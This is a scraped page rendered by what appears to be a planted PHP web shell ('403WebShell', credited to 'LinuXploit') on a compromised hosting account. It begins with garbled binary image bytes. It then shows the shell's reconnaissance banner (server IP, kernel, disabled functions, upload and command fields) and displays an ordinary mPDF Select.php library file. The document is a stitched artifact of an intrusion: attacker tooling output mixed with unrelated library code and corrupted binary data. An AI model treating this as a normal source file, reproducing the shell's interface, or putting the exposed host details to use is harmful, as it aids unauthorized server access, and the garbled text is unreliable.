JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 88.223.91.21  /  Your IP : 216.73.216.239
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/./self/root/home/u686484674/vendor/mpdf/mpdf/src/Tag/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/./self/root/home/u686484674/vendor/mpdf/mpdf/src/Tag/Select.php
<?php

namespace Mpdf\Tag;

use Mpdf\Mpdf;

class Select extends Tag
{

	public function open($attr, &$ahtml, &$ihtml)
	{
		$this->mpdf->lastoptionaltag = ''; // Save current HTML specified optional endtag
		$this->mpdf->InlineProperties['SELECT'] = $this->mpdf->saveInlineProperties();
		$properties = $this->cssManager->MergeCSS('', 'SELECT', $attr);
		if (isset($properties['FONT-FAMILY'])) {
			$this->mpdf->SetFont($properties['FONT-FAMILY'], $this->mpdf->FontStyle, 0, false);
		}
		if (isset($properties['FONT-SIZE'])) {
			$mmsize = $this->sizeConverter->convert($properties['FONT-SIZE'], $this->mpdf->default_font_size / Mpdf::SCALE);
			$this->mpdf->SetFontSize($mmsize * Mpdf::SCALE, false);
		}
		if (isset($attr['SPELLCHECK']) && strtolower($attr['SPELLCHECK']) === 'true') {
			$this->mpdf->selectoption['SPELLCHECK'] = true;
		}

		if (isset($properties['COLOR'])) {
			$this->mpdf->selectoption['COLOR'] = $this->colorConverter->convert($properties['COLOR'], $this->mpdf->PDFAXwarnings);
		}
		$this->mpdf->specialcontent = 'type=select';
		if (isset($attr['DISABLED'])) {
			$this->mpdf->selectoption['DISABLED'] = $attr['DISABLED'];
		}
		if (isset($attr['READONLY'])) {
			$this->mpdf->selectoption['READONLY'] = $attr['READONLY'];
		}
		if (isset($attr['REQUIRED'])) {
			$this->mpdf->selectoption['REQUIRED'] = $attr['REQUIRED'];
		}
		if (isset($attr['EDITABLE'])) {
			$this->mpdf->selectoption['EDITABLE'] = $attr['EDITABLE'];
		}
		if (isset($attr['TITLE'])) {
			$this->mpdf->selectoption['TITLE'] = $attr['TITLE'];
		}
		if (isset($attr['MULTIPLE'])) {
			$this->mpdf->selectoption['MULTIPLE'] = $attr['MULTIPLE'];
		}
		if (isset($attr['SIZE']) && $attr['SIZE'] > 1) {
			$this->mpdf->selectoption['SIZE'] = $attr['SIZE'];
		}
		if ($this->mpdf->useActiveForms) {
			if (isset($attr['NAME'])) {
				$this->mpdf->selectoption['NAME'] = $attr['NAME'];
			}
			if (isset($attr['ONCHANGE'])) {
				$this->mpdf->selectoption['ONCHANGE'] = $attr['ONCHANGE'];
			}
		}
	}

	public function close(&$ahtml, &$ihtml)
	{
		$this->mpdf->ignorefollowingspaces = false;
		$this->mpdf->lastoptionaltag = '';
		$texto = '';
		$OTLdata = false;
		if (isset($this->mpdf->selectoption['SELECTED'])) {
			$texto = $this->mpdf->selectoption['SELECTED'];
		}
		if (isset($this->mpdf->selectoption['SELECTED-OTLDATA'])) {
			$OTLdata = $this->mpdf->selectoption['SELECTED-OTLDATA'];
		}

		if ($this->mpdf->useActiveForms) {
			$w = $this->mpdf->selectoption['MAXWIDTH'];
		} else {
			$w = $this->mpdf->GetStringWidth($texto, true, $OTLdata);
		}
		if ($w == 0) {
			$w = 5;
		}
		$objattr['type'] = 'select';
		$objattr['text'] = $texto;
		$objattr['OTLdata'] = $OTLdata;
		if (isset($this->mpdf->selectoption['NAME'])) {
			$objattr['fieldname'] = $this->mpdf->selectoption['NAME'];
		}
		if (isset($this->mpdf->selectoption['READONLY'])) {
			$objattr['readonly'] = true;
		}
		if (isset($this->mpdf->selectoption['REQUIRED'])) {
			$objattr['required'] = true;
		}
		if (isset($this->mpdf->selectoption['SPELLCHECK'])) {
			$objattr['spellcheck'] = true;
		}
		if (isset($this->mpdf->selectoption['EDITABLE'])) {
			$objattr['editable'] = true;
		}
		if (isset($this->mpdf->selectoption['ONCHANGE'])) {
			$objattr['onChange'] = $this->mpdf->selectoption['ONCHANGE'];
		}
		if (isset($this->mpdf->selectoption['ITEMS'])) {
			$objattr['items'] = $this->mpdf->selectoption['ITEMS'];
		}
		if (isset($this->mpdf->selectoption['MULTIPLE'])) {
			$objattr['multiple'] = $this->mpdf->selectoption['MULTIPLE'];
		}
		if (isset($this->mpdf->selectoption['DISABLED'])) {
			$objattr['disabled'] = $this->mpdf->selectoption['DISABLED'];
		}
		if (isset($this->mpdf->selectoption['TITLE'])) {
			$objattr['title'] = $this->mpdf->selectoption['TITLE'];
		}
		if (isset($this->mpdf->selectoption['COLOR'])) {
			$objattr['color'] = $this->mpdf->selectoption['COLOR'];
		}
		if (isset($this->mpdf->selectoption['SIZE'])) {
			$objattr['size'] = $this->mpdf->selectoption['SIZE'];
		}
		$rows = 1;
		if (isset($objattr['size']) && $objattr['size'] > 1) {
			$rows = $objattr['size'];
		}

		$objattr['fontfamily'] = $this->mpdf->FontFamily;
		$objattr['fontsize'] = $this->mpdf->FontSizePt;

		$objattr['width'] = $w + ($this->form->form_element_spacing['select']['outer']['h'] * 2)
			+ ($this->form->form_element_spacing['select']['inner']['h'] * 2) + ($this->mpdf->FontSize * 1.4);

		$objattr['height'] = ($this->mpdf->FontSize * $rows) + ($this->form->form_element_spacing['select']['outer']['v'] * 2)
			+ ($this->form->form_element_spacing['select']['inner']['v'] * 2);

		$e = Mpdf::OBJECT_IDENTIFIER . "type=select,objattr=" . serialize($objattr) . Mpdf::OBJECT_IDENTIFIER;

		// Output it to buffers
		if ($this->mpdf->tableLevel) { // *TABLES*
			$this->mpdf->_saveCellTextBuffer($e, $this->mpdf->HREF);
			$this->mpdf->cell[$this->mpdf->row][$this->mpdf->col]['s'] += $objattr['width']; // *TABLES*
		} // *TABLES*
		else { // *TABLES*
			$this->mpdf->_saveTextBuffer($e, $this->mpdf->HREF);
		} // *TABLES*

		$this->mpdf->selectoption = [];
		$this->mpdf->specialcontent = '';

		if ($this->mpdf->InlineProperties['SELECT']) {
			$this->mpdf->restoreInlineProperties($this->mpdf->InlineProperties['SELECT']);
		}
		unset($this->mpdf->InlineProperties['SELECT']);
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit